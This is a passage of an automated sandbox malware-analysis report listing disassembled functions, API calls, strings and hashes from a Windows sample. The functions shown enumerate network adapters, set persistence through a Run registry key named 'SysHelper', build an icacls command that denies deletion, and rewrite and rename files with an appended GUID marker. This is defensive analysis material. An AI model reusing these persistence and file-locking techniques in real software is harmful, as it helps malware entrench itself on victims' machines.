                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Crypt$Exception@8HashThrow$ContextParam$AcquireCreateDataDestroyExceptionRaiseRelease_memset_sprintf
                                                                                                                            • String ID: %.2X
                                                                                                                            • API String ID: 1637485200-213608013
                                                                                                                            • Opcode ID: 0c0433b66f6048f8c2c71afa341c94106f981ccd626fe9dad670276b8a97b787
                                                                                                                            • Instruction ID: ea4b1a449e4bdfdf83846fbe935d5cf7bab8ad935e32adb0a5d9a84497b4640b
                                                                                                                            • Opcode Fuzzy Hash: 0c0433b66f6048f8c2c71afa341c94106f981ccd626fe9dad670276b8a97b787
                                                                                                                            • Instruction Fuzzy Hash: 59516171D40209AADF20DBA1CC46FEFBBB8EF15704F14052AF902B7281E77969058BA5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0046E670 Relevance: 26.3, APIs: 12, Strings: 3, Instructions: 78COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1792 46e670-46e697 call 480c62 * 2 1797 46e6b4-46e6c2 GetAdaptersInfo 1792->1797 1798 46e699-46e6b3 call 481f2d call 480bed 1792->1798 1800 46e6c4-46e6d9 call 480bed call 480c62 1797->1800 1801 46e6db-46e6e8 GetAdaptersInfo 1797->1801 1800->1798 1800->1801 1802 46e744-46e754 call 480bed 1801->1802 1803 46e6ea-46e73c call 4804a6 call 481f2d * 2 1801->1803 1818 46e741 1803->1818 1818->1802
                                                                                                                            APIs
                                                                                                                            • _malloc.LIBCMT ref: 0046E67F
                                                                                                                              • Part of subcall function 00480C62: __FF_MSGBANNER.LIBCMT ref: 00480C79
                                                                                                                              • Part of subcall function 00480C62: __NMSG_WRITE.LIBCMT ref: 00480C80
                                                                                                                              • Part of subcall function 00480C62: RtlAllocateHeap.NTDLL(00A30000,00000000,00000001,00000001,?,?,?,00490E81,00000001,00000000,?,?,?,00490D1A,004AF284,?), ref: 00480CA5
                                                                                                                            • _malloc.LIBCMT ref: 0046E68B
                                                                                                                            • _wprintf.LIBCMT ref: 0046E69E
                                                                                                                            • _free.LIBCMT ref: 0046E6A4
                                                                                                                              • Part of subcall function 00480BED: RtlFreeHeap.NTDLL(00000000,00000000,?,0048507F,00000000,00000001,00000000,?,?,?,00490D1A,004AF284,?), ref: 00480C01
                                                                                                                              • Part of subcall function 00480BED: GetLastError.KERNEL32(00000000,?,0048507F,00000000,00000001,00000000,?,?,?,00490D1A,004AF284,?), ref: 00480C13
                                                                                                                            • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0046E6B9
                                                                                                                            • _free.LIBCMT ref: 0046E6C5
                                                                                                                            • _malloc.LIBCMT ref: 0046E6CD
                                                                                                                            • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0046E6E0
                                                                                                                            • _sprintf.LIBCMT ref: 0046E720
                                                                                                                            • _wprintf.LIBCMT ref: 0046E732
                                                                                                                            • _wprintf.LIBCMT ref: 0046E73C
                                                                                                                            • _free.LIBCMT ref: 0046E745
                                                                                                                            Strings
                                                                                                                            • %02X:%02X:%02X:%02X:%02X:%02X, xrefs: 0046E71A
                                                                                                                            • Error allocating memory needed to call GetAdaptersinfo, xrefs: 0046E699
                                                                                                                            • Address: %s, mac: %s, xrefs: 0046E72D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _free_malloc_wprintf$AdaptersHeapInfo$AllocateErrorFreeLast_sprintf
                                                                                                                            • String ID: %02X:%02X:%02X:%02X:%02X:%02X$Address: %s, mac: %s$Error allocating memory needed to call GetAdaptersinfo
                                                                                                                            • API String ID: 3901070236-1604013687
                                                                                                                            • Opcode ID: 1dd8d9867e866b96d28c185dae63fafa09baea85afa098e5432305184f33c286
                                                                                                                            • Instruction ID: 62ca1a70ffacf71c8f83b6ce1a21f458bd1db17afd21658e11326da53ba1915f
                                                                                                                            • Opcode Fuzzy Hash: 1dd8d9867e866b96d28c185dae63fafa09baea85afa098e5432305184f33c286
                                                                                                                            • Instruction Fuzzy Hash: BB113AB29005547BC2B173B64C06EFF3ADC8F46706F04056FFE98D5142E65C5A09A3BA
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0046FB98 Relevance: 15.3, APIs: 10, Instructions: 266stringCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 2196 46fb98-46fb9f 2197 46fba0-46fbb9 2196->2197 2197->2197 2198 46fbbb-46fbcf 2197->2198 2199 46fbd3-46fc02 PathAppendW call 478400 2198->2199 2200 46fbd1 2198->2200 2203 46fc04-46fc0c call 482587 2199->2203 2204 46fc0f-46fc29 2199->2204 2200->2199 2203->2204 2205 46fc2b-46fc2f 2204->2205 2206 46fc49-46fc4c 2204->2206 2209 46fc31-46fc47 call 4805a0 2205->2209 2210 46fc4f-46fc6b PathFileExistsW 2205->2210 2206->2210 2209->2210 2212 46fcdf-46fce5 2210->2212 2213 46fc6d-46fc86 call 480c62 2210->2213 2215 46fce7-46fced call 482587 2212->2215 2216 46fcf0-46fd07 call 477140 2212->2216 2223 46fc8a-46fc9f lstrcpyW 2213->2223 2224 46fc88 2213->2224 2215->2216 2225 46fd0b-46fd20 FindFirstFileW 2216->2225 2226 46fd09 2216->2226 2227 46fca3-46fcdc lstrcatW call 474690 call 46f0e0 call 480bed 2223->2227 2228 46fca1 2223->2228 2224->2223 2229 46fd22-46fd2d call 482587 2225->2229 2230 46fd30-46fd4c 2225->2230 2226->2225 2227->2212 2228->2227 2229->2230 2233 46fd52-46fd55 2230->2233 2234 470072-470076 2230->2234 2238 46fd60-46fd6b 2233->2238 2239 470086-4700a4 2234->2239 2240 470078-470083 call 482587 2234->2240 2244 46fd70-46fd76 2238->2244 2241 4700a6-4700ae call 482587 2239->2241 2242 4700b1-4700c9 2239->2242 2240->2239 2241->2242 2248 4700d6-4700ee 2242->2248 2249 4700cb-4700d3 call 482587 2242->2249 2250 46fd96-46fd98 2244->2250 2251 46fd78-46fd7b 2244->2251 2262 4700f0-4700f8 call 482587 2248->2262 2263 4700fb-47010b 2248->2263 2249->2248 2259 46fd9b-46fd9d 2250->2259 2256 46fd92-46fd94 2251->2256 2257 46fd7d-46fd85 2251->2257 2256->2259 2257->2250 2261 46fd87-46fd90 2257->2261 2264 470052-470065 FindNextFileW 2259->2264 2265 46fda3-46fdae 2259->2265 2261->2244 2261->2256 2262->2263 2264->2238 2267 47006b-47006c FindClose 2264->2267 2268 46fdb0-46fdb6 2265->2268 2267->2234 2270 46fdd6-46fdd8 2268->2270 2271 46fdb8-46fdbb 2268->2271 2272 46fddb-46fddd 2270->2272 2273 46fdd2-46fdd4 2271->2273 2274 46fdbd-46fdc5 2271->2274 2272->2264 2275 46fde3-46fdea 2272->2275 2273->2272 2274->2270 2276 46fdc7-46fdd0 2274->2276 2277 46fec2-46fecc 2275->2277 2278 46fdf0-46fe71 call 477140 call 475ae0 call 474690 call 473b70 2275->2278 2276->2268 2276->2273 2279 46fece-46fed5 call 471ab0 2277->2279 2280 46feda-46fede 2277->2280 2302 46fe73-46fe7e call 482587 2278->2302 2303 46fe81-46fea9 2278->2303 2279->2280 2280->2264 2284 46fee4-46ff13 call 474690 2280->2284 2290 46ff15-46ff17 2284->2290 2291 46ff19-46ff1f 2284->2291 2293 46ff31-46ff6a call 475ae0 PathFindExtensionW 2290->2293 2294 46ff22-46ff2b 2291->2294 2300 46ff6c 2293->2300 2301 46ff9a-46ffa8 2293->2301 2294->2294 2297 46ff2d-46ff2f 2294->2297 2297->2293 2305 46ff70-46ff74 2300->2305 2306 46ffda-46ffde 2301->2306 2307 46ffaa 2301->2307 2302->2303 2303->2264 2304 46feaf-46febd call 482587 2303->2304 2304->2264 2310 46ff76-46ff78 2305->2310 2311 46ff7a 2305->2311 2312 46ffe0-46ffe9 2306->2312 2313 47003a-470042 2306->2313 2314 46ffb0-46ffb4 2307->2314 2319 46ff7c-46ff88 call 481c02 2310->2319 2311->2319 2322 46ffed-46fff9 call 481c02 2312->2322 2323 46ffeb 2312->2323 2320 470044-47004c call 482587 2313->2320 2321 47004f 2313->2321 2316 46ffb6-46ffb8 2314->2316 2317 46ffba 2314->2317 2324 46ffbc-46ffce call 481c02 2316->2324 2317->2324 2333 46ff93 2319->2333 2334 46ff8a-46ff8f 2319->2334 2320->2321 2321->2264 2322->2313 2335 46fffb-47000b 2322->2335 2323->2322 2324->2313 2336 46ffd0-46ffd5 2324->2336 2338 46ff97 2333->2338 2334->2305 2337 46ff91 2334->2337 2339 47000f-470026 call 481c02 2335->2339 2340 47000d 2335->2340 2336->2314 2342 46ffd7 2336->2342 2337->2338 2338->2301 2339->2313 2344 470028-470035 call 4711c0 2339->2344 2340->2339 2342->2306 2344->2313
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Path$AppendExistsFile_free_malloc_memmovelstrcatlstrcpy
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3232302685-0
                                                                                                                            • Opcode ID: dd362e5463ae82b735edcd23759e20c2ed518d569bcc91fe482a5118c27e5902
                                                                                                                            • Instruction ID: 59b0d89b13b52cafe7865db0817cae3585a529c84d81ba7369e7c46ed2be6a09
                                                                                                                            • Opcode Fuzzy Hash: dd362e5463ae82b735edcd23759e20c2ed518d569bcc91fe482a5118c27e5902
                                                                                                                            • Instruction Fuzzy Hash: 7BB19F70D00208DBDF20EFA4DD45BDEB7B5BF15308F10446AE40AAB251E779AA49CF5A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00471CD0 Relevance: 79.1, APIs: 36, Strings: 9, Instructions: 382stringregistrylibraryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 985 471cd0-471d1a call 48f7c0 RegOpenKeyExW 988 472207-472216 985->988 989 471d20-471d8d call 48b420 RegQueryValueExW RegCloseKey 985->989 992 471d93-471d9c 989->992 993 471d8f-471d91 989->993 995 471da0-471da9 992->995 994 471daf-471dcb call 475c10 993->994 999 471dd1-471df8 lstrlenA call 473520 994->999 1000 471e7c-471e87 994->1000 995->995 996 471dab-471dad 995->996 996->994 1007 471dfa-471dfe 999->1007 1008 471e28-471e2c 999->1008 1002 471e94-471f34 LoadLibraryW GetProcAddress GetCommandLineW CommandLineToArgvW lstrcpyW PathFindFileNameW UuidCreate UuidToStringW 1000->1002 1003 471e89-471e91 call 482587 1000->1003 1012 471f36-471f38 1002->1012 1013 471f3a-471f3f 1002->1013 1003->1002 1014 471e00-471e08 call 482587 1007->1014 1015 471e0b-471e23 call 4745a0 1007->1015 1010 471e2e-471e39 call 482587 1008->1010 1011 471e3c-471e50 PathFileExistsW 1008->1011 1010->1011 1011->1000 1019 471e52-471e57 1011->1019 1017 471f4f-471f96 call 475c10 RpcStringFreeW PathAppendW CreateDirectoryW 1012->1017 1018 471f40-471f49 1013->1018 1014->1015 1015->1008 1032 471fce-471fe9 1017->1032 1033 471f98-471fa0 1017->1033 1018->1018 1023 471f4b-471f4d 1018->1023 1024 471e6a-471e6e 1019->1024 1025 471e59-471e5e 1019->1025 1023->1017 1024->988 1030 471e74-471e77 1024->1030 1025->1024 1028 471e60-471e65 call 474690 1025->1028 1028->1024 1034 4721ff-472204 call 482587 1030->1034 1035 471fef-471ff8 1032->1035 1036 471feb-471fed 1032->1036 1037 471fa6-471faf 1033->1037 1038 471fa2-471fa4 1033->1038 1034->988 1041 472000-472009 1035->1041 1040 47200f-472076 call 475c10 PathAppendW DeleteFileW CopyFileW RegOpenKeyExW 1036->1040 1044 471fb0-471fb9 1037->1044 1042 471fbf-471fc9 call 475c10 1038->1042 1050 4721d1-4721d5 1040->1050 1051 47207c-472107 call 48b420 lstrcpyW lstrcatW * 2 lstrlenW RegSetValueExW RegCloseKey 1040->1051 1041->1041 1045 47200b-47200d 1041->1045 1042->1032 1044->1044 1047 471fbb-471fbd 1044->1047 1045->1040 1047->1042 1052 4721d7-4721df call 482587 1050->1052 1053 4721e2-4721fa 1050->1053 1059 472115-4721a8 call 48b420 SetLastError lstrcpyW lstrcatW * 2 CreateProcessW 1051->1059 1060 472109-472110 call 473260 1051->1060 1052->1053 1053->988 1056 4721fc 1053->1056 1056->1034 1064 4721b2-4721b8 1059->1064 1065 4721aa-4721b0 GetLastError 1059->1065 1060->1059 1066 4721c0-4721cf WaitForSingleObject 1064->1066 1065->1050 1066->1050 1066->1066
                                                                                                                            APIs
                                                                                                                            • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,0052AC68,000000FF), ref: 00471D12
                                                                                                                            • _memset.LIBCMT ref: 00471D3B
                                                                                                                            • RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00471D63
                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0052AC68,000000FF), ref: 00471D6C
                                                                                                                            • lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00471DD6
                                                                                                                            • PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00471E48
                                                                                                                            • LoadLibraryW.KERNEL32(Shell32.dll,?,?), ref: 00471E99
                                                                                                                            • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 00471EA5
                                                                                                                            • GetCommandLineW.KERNEL32 ref: 00471EB4
                                                                                                                            • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00471EBF
                                                                                                                            • lstrcpyW.KERNEL32(?,00000000), ref: 00471ECE
                                                                                                                            • PathFindFileNameW.SHLWAPI(?), ref: 00471EDB
                                                                                                                            • UuidCreate.RPCRT4(?), ref: 00471EFC
                                                                                                                            • UuidToStringW.RPCRT4(?,?), ref: 00471F14
                                                                                                                            • RpcStringFreeW.RPCRT4(00000000), ref: 00471F64
                                                                                                                            • PathAppendW.SHLWAPI(?,?), ref: 00471F83
                                                                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 00471F8E
                                                                                                                            • PathAppendW.SHLWAPI(?,?,?,?), ref: 0047202D
                                                                                                                            • DeleteFileW.KERNEL32(?), ref: 00472036
                                                                                                                            • CopyFileW.KERNEL32(?,?,00000000), ref: 0047204C
                                                                                                                            • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 0047206E
                                                                                                                            • _memset.LIBCMT ref: 00472090
                                                                                                                            • lstrcpyW.KERNEL32(?,005602FC), ref: 004720AA
                                                                                                                            • lstrcatW.KERNEL32(?,?), ref: 004720C0
                                                                                                                            • lstrcatW.KERNEL32(?," --AutoStart), ref: 004720CE
                                                                                                                            • lstrlenW.KERNEL32(?), ref: 004720D7
                                                                                                                            • RegSetValueExW.ADVAPI32(00000000,SysHelper,00000000,00000002,?,00000000), ref: 004720F3
                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 004720FC
                                                                                                                            • _memset.LIBCMT ref: 00472120
                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 00472146
                                                                                                                            • lstrcpyW.KERNEL32(?,icacls "), ref: 00472158
                                                                                                                            • lstrcatW.KERNEL32(?,?), ref: 0047216D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: FilePath$_memsetlstrcatlstrcpy$AppendCloseCommandCreateLineOpenStringUuidValuelstrlen$AddressArgvCopyDeleteDirectoryErrorExistsFindFreeLastLibraryLoadNameProcQuery
                                                                                                                            • String ID: " --AutoStart$" --AutoStart$" /deny *S-1-1-0:(OI)(CI)(DE,DC)$D$SHGetFolderPathW$Shell32.dll$Software\Microsoft\Windows\CurrentVersion\Run$SysHelper$icacls "
                                                                                                                            • API String ID: 2589766509-1182136429
                                                                                                                            • Opcode ID: 12594434355d41f5fa51b9ec8c61841ab39e7dccdf472197b5caccaf72c6b4f5
                                                                                                                            • Instruction ID: 6fa5f262b01b05fbd2709d1527e0c51e15416143bd43534c892a36d535dda116
                                                                                                                            • Opcode Fuzzy Hash: 12594434355d41f5fa51b9ec8c61841ab39e7dccdf472197b5caccaf72c6b4f5
                                                                                                                            • Instruction Fuzzy Hash: 6EE1AF71D00219ABDF24DBA0CD49FEFBBB8BF04304F1044AAE509A7191EB746A89CF54
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004711C0 Relevance: 65.3, APIs: 36, Strings: 1, Instructions: 551filestringmemoryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1067 4711c0-47121d CreateFileW 1068 471223-471232 GetFileSizeEx 1067->1068 1069 4718eb-4718fb 1067->1069 1070 471234 1068->1070 1071 4712a3-4712be VirtualAlloc 1068->1071 1074 471236-47123a 1070->1074 1075 47123c-471281 CloseHandle call 473100 call 4759d0 MoveFileW 1070->1075 1072 4712c0-4712d5 call 48b420 1071->1072 1073 47131a-471331 CloseHandle 1071->1073 1081 4713b1 1072->1081 1082 4712db-4712de 1072->1082 1074->1071 1074->1075 1075->1069 1089 471287-4712a2 call 482587 1075->1089 1083 4713b7-4713ef SetFilePointer 1081->1083 1085 4712e0-4712e3 1082->1085 1086 4712e9-47130a SetFilePointerEx 1082->1086 1087 4713f5-47140d ReadFile 1083->1087 1088 4715bf 1083->1088 1085->1081 1085->1086 1090 471332-47134d ReadFile 1086->1090 1091 47130c-471314 VirtualFree 1086->1091 1092 471440-471445 1087->1092 1093 47140f-47143f VirtualFree CloseHandle call 472d50 1087->1093 1095 4715c5-4715d9 SetFilePointerEx 1088->1095 1090->1091 1094 47134f-471354 1090->1094 1091->1073 1092->1088 1099 47144b-47146b 1092->1099 1094->1091 1098 471356-471359 1094->1098 1095->1093 1100 4715df-4715eb 1095->1100 1098->1083 1103 47135b-471377 call 472c40 call 477060 1098->1103 1104 471471-4715a8 lstrlenA call 480be4 lstrlenA call 48d8d0 lstrlenA call 46eaa0 call 482110 call 46c5c0 call 472d10 call 472d50 call 46bbd0 call 46bd50 call 473ff0 call 472f70 call 46c070 SetFilePointer 1099->1104 1105 471718-4717d9 lstrlenA call 480be4 lstrlenA call 48d8d0 lstrlenA call 46eaa0 call 482110 call 46bbd0 call 46bd50 call 472f70 call 46c070 1099->1105 1106 47160e-471643 call 4730b0 call 472840 1100->1106 1107 4715ed-4715fc WriteFile 1100->1107 1130 4713a7-4713af call 472d50 1103->1130 1131 471379-471391 VirtualFree CloseHandle call 472d50 1103->1131 1182 4717e1-47182e call 472d50 call 472c40 call 472bf0 call 46cba0 1104->1182 1195 4715ae-4715ba call 472d50 * 2 1104->1195 1105->1182 1127 471647-47165a WriteFile call 472d50 1106->1127 1128 471645 1106->1128 1107->1093 1111 471602-47160b call 482110 1107->1111 1111->1106 1127->1093 1143 471660-471680 lstrlenA WriteFile 1127->1143 1128->1127 1130->1083 1140 471396-4713a6 1131->1140 1143->1093 1147 471686-4716de CloseHandle call 473100 call 4759d0 MoveFileW 1143->1147 1162 4718a7-4718d3 call 473210 call 472d50 1147->1162 1163 4716e4-4716f7 VirtualFree call 473210 1147->1163 1184 4718d5-4718dd VirtualFree 1162->1184 1185 4718e3-4718e6 1162->1185 1171 4716fc-471717 call 472d50 1163->1171 1203 471830-471832 1182->1203 1204 47186e-4718a6 VirtualFree CloseHandle call 472d50 * 2 1182->1204 1184->1185 1185->1069 1188 4718e8-4718e9 CloseHandle 1185->1188 1188->1069 1195->1088 1203->1204 1206 471834-47185b WriteFile 1203->1206 1206->1204 1208 47185d-471869 call 472d50 1206->1208 1208->1095
                                                                                                                            APIs
                                                                                                                            • CreateFileW.KERNEL32(00000000,C0000000,00000001,00000000,00000003,00000080,00000000,?,00000000,?), ref: 0047120F
                                                                                                                            • GetFileSizeEx.KERNEL32(00000000,?,?,00000000,?), ref: 00471228
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 0047123D
                                                                                                                            • MoveFileW.KERNEL32(00000000,?), ref: 00471277
                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00025815,00001000,00000004,?,00000000,?), ref: 004712B1
                                                                                                                            • _memset.LIBCMT ref: 004712C8
                                                                                                                            • SetFilePointerEx.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?), ref: 00471301
                                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?), ref: 00471314
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 0047131B
                                                                                                                            • ReadFile.KERNEL32(00000000,00000000,00000026,?,00000000,?,00000000,?), ref: 00471349
                                                                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,?,00000000,?), ref: 00471381
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 00471388
                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?), ref: 004713E6
                                                                                                                            • ReadFile.KERNEL32(00000000,00000000,00025805,?,00000000,?,00000000,?), ref: 00471409
                                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?), ref: 00471417
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 0047141E
                                                                                                                            • lstrlenA.KERNEL32(?,?,00000000,?), ref: 00471471
                                                                                                                            • lstrlenA.KERNEL32(?,?,?,00000000,?), ref: 00471491
                                                                                                                            • lstrlenA.KERNEL32(?,00000000,?,?,?,?,?,00000000,?), ref: 004714CF
                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000005,00000000,00000000,00000005,00000000,-000000FB,-000000FB,00000000,00000000,000000FF,00000000,00000000,00000000), ref: 0047159D
                                                                                                                            • SetFilePointerEx.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?), ref: 004715D0
                                                                                                                            • WriteFile.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?), ref: 004715F8
                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00471649
                                                                                                                            • lstrlenA.KERNEL32({36A698B9-D67C-4E07-BE82-0EC5B14B4DF5},00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0047166B
                                                                                                                            • WriteFile.KERNEL32(00000000,{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5},00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00471678
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?), ref: 0047168D
                                                                                                                            • MoveFileW.KERNEL32(?,?), ref: 004716D6
                                                                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004716EB
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: File$CloseHandleVirtual$FreePointerlstrlen$Write$MoveRead$AllocCreateSize_memset
                                                                                                                            • String ID: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                            • API String ID: 254274740-1186676987
                                                                                                                            • Opcode ID: 662a2683772c121d5f297c8ed048232c75eecf7dad31dbd4682c02e5d7b9e720
                                                                                                                            • Instruction ID: 52531c9328a7ede164959e1c9449a90a44ccf87d75ca7bb7b90b4b90e358a2ef
                                                                                                                            • Opcode Fuzzy Hash: 662a2683772c121d5f297c8ed048232c75eecf7dad31dbd4682c02e5d7b9e720
                                                                                                                            • Instruction Fuzzy Hash: 5022C270D00208EFDB24DBA9DC85BEEBB78EF15304F10815AF519B7292DB785A09CB65
                                                                                                                            Uniqueness

